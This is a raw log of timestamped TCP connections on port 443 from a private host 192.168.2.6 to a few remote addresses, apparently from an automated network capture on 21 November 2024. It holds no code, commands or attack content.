                                                                                                                                                                                                            Nov 21, 2024 15:17:57.171737909 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.171770096 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.373733997 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.373753071 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.373780012 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.373835087 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.373863935 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.373883963 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.373950958 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.412055016 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.412079096 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.412254095 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.412272930 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.412316084 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.412329912 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.461519003 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.461719990 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.461736917 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.461759090 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.461792946 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.461843014 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.490027905 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:57.490046024 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.002085924 CET4434986013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.002602100 CET49860443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.002624035 CET4434986013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.003035069 CET49860443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.003041029 CET4434986013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.452250957 CET4434986013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.455168962 CET4434986013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.455307961 CET49860443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.455307961 CET49860443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.455352068 CET49860443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.455368042 CET4434986013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.458026886 CET49874443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.458076954 CET4434987413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.458184004 CET49874443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.458311081 CET49874443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.458323956 CET4434987413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.488344908 CET4434986113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.488811970 CET49861443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.488833904 CET4434986113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.489278078 CET49861443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.489284039 CET4434986113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.563755989 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.564227104 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.564244986 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.564681053 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.564687967 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.597043991 CET4434986313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.597516060 CET49863443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.597548962 CET4434986313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.597971916 CET49863443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.597980976 CET4434986313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.728091002 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.728652000 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.728671074 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.729197979 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.729203939 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.941067934 CET4434986113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.944365025 CET4434986113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.944422960 CET49861443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.944483042 CET49861443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.944504023 CET4434986113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.944520950 CET49861443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.944526911 CET4434986113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.947223902 CET49875443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.947261095 CET4434987513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.947407007 CET49875443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.947586060 CET49875443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:58.947592974 CET4434987513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.042383909 CET4434986313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.045460939 CET4434986313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.045516968 CET49863443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.045578957 CET49863443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.045578957 CET49863443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.045597076 CET4434986313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.045600891 CET4434986313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.045979023 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.046016932 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.046058893 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.046068907 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.046080112 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.046124935 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.046503067 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.046518087 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.046528101 CET49862443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.046533108 CET4434986213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.048746109 CET49877443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.048751116 CET49876443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.048788071 CET4434987713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.048790932 CET4434987613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.048866987 CET49877443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.049011946 CET49876443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.049011946 CET49876443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.049031019 CET49877443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.049046993 CET4434987713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.049051046 CET4434987613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.179624081 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.182629108 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.182673931 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.182727098 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.182786942 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.182806969 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.182820082 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.182826996 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.185470104 CET49880443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.185513973 CET4434988013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.185635090 CET49880443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.186099052 CET49880443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:59.186114073 CET4434988013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.238796949 CET44349832216.58.206.68192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.238877058 CET44349832216.58.206.68192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.238918066 CET49832443192.168.2.6216.58.206.68
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.241132021 CET4434987413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.243556023 CET49874443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.243583918 CET4434987413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.244107962 CET49874443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.244117022 CET4434987413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.250521898 CET49832443192.168.2.6216.58.206.68
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.250544071 CET44349832216.58.206.68192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.697180986 CET4434987413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.700182915 CET4434987413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.700253010 CET49874443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.700315952 CET49874443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.700337887 CET4434987413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.700347900 CET49874443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.700355053 CET4434987413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.703916073 CET49892443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.703960896 CET4434989213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.704032898 CET49892443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.704229116 CET49892443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.704243898 CET4434989213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.765964031 CET4434987613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.768861055 CET49876443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.768892050 CET4434987613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.769292116 CET49876443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.769296885 CET4434987613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.772898912 CET4434987513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.773447037 CET49875443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.773483992 CET4434987513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.773938894 CET49875443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.773947954 CET4434987513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.894491911 CET4434987713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.895503998 CET49877443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.895534992 CET4434987713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.895958900 CET49877443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.895965099 CET4434987713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.971710920 CET4434988013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.972163916 CET49880443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.972187042 CET4434988013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.972853899 CET49880443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:00.972860098 CET4434988013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.201456070 CET4434987613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.204519033 CET4434987613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.204580069 CET4434987613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.204636097 CET49876443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.206302881 CET49876443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.206326008 CET4434987613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.206343889 CET49876443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.206352949 CET4434987613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.209170103 CET49893443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.209216118 CET4434989313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.209273100 CET49893443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.210544109 CET49893443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.210561991 CET4434989313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.215080023 CET4434987513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.217977047 CET4434987513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.218070984 CET49875443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.218553066 CET49875443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.218570948 CET4434987513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.218588114 CET49875443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.218594074 CET4434987513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.220653057 CET49895443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.220671892 CET4434989513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.220741034 CET49895443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.221112967 CET49895443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.221127033 CET4434989513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.348335028 CET4434987713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.351265907 CET4434987713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.351532936 CET49877443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.351577997 CET49877443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.351596117 CET4434987713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.351607084 CET49877443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.351612091 CET4434987713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.354559898 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.354588032 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.354850054 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.354989052 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.355000973 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.415621042 CET4434988013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.418665886 CET4434988013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.418811083 CET49880443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.419172049 CET49880443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.419188023 CET4434988013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.457421064 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.457473993 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.459007978 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.459404945 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:01.459428072 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:02.560812950 CET4434989213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:02.670099974 CET49892443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:02.964327097 CET4434989313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.009259939 CET49893443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.026345968 CET4434989513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.052175999 CET49892443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.052196980 CET4434989213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.052679062 CET49892443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.052684069 CET4434989213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.066869020 CET49893443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.066879034 CET4434989313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.067329884 CET49893443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.067348957 CET4434989313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.068717003 CET49895443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.068737984 CET4434989513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.069178104 CET49895443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.069184065 CET4434989513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.152059078 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.172990084 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.173022032 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.173683882 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.173691034 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.241394043 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.283073902 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.323559999 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.323580980 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.324316025 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.324321985 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.386960030 CET4434989213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.387032032 CET4434989213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.387118101 CET49892443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.388212919 CET49892443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.388212919 CET49892443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.388231039 CET4434989213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.388241053 CET4434989213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.392682076 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.392714977 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.392931938 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.393270969 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.393281937 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.398705006 CET4434989313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.401905060 CET4434989313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.401957035 CET49893443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.402228117 CET49893443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.402245045 CET4434989313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.402256012 CET49893443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.402261972 CET4434989313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.407192945 CET49908443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.407253027 CET4434990813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.407310009 CET49908443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.407447100 CET49908443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.407464027 CET4434990813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.445679903 CET49909443192.168.2.652.149.20.212
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.445717096 CET4434990952.149.20.212192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.445785046 CET49909443192.168.2.652.149.20.212
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.446803093 CET49909443192.168.2.652.149.20.212
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.446818113 CET4434990952.149.20.212192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.469834089 CET4434989513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.473115921 CET4434989513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.473170042 CET4434989513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.473198891 CET49895443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.473237038 CET49895443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.473473072 CET49895443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.473490953 CET4434989513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.473500967 CET49895443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.473505974 CET4434989513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.476203918 CET49910443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.476259947 CET4434991013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.476336002 CET49910443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.476459026 CET49910443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.476474047 CET4434991013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.595997095 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.599237919 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.599297047 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.601938963 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.601960897 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.601967096 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.601973057 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.619484901 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.619518995 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.619769096 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.619874954 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.619888067 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.685290098 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:03.688251019 CET4434989813.107.246.45192.168.2.6
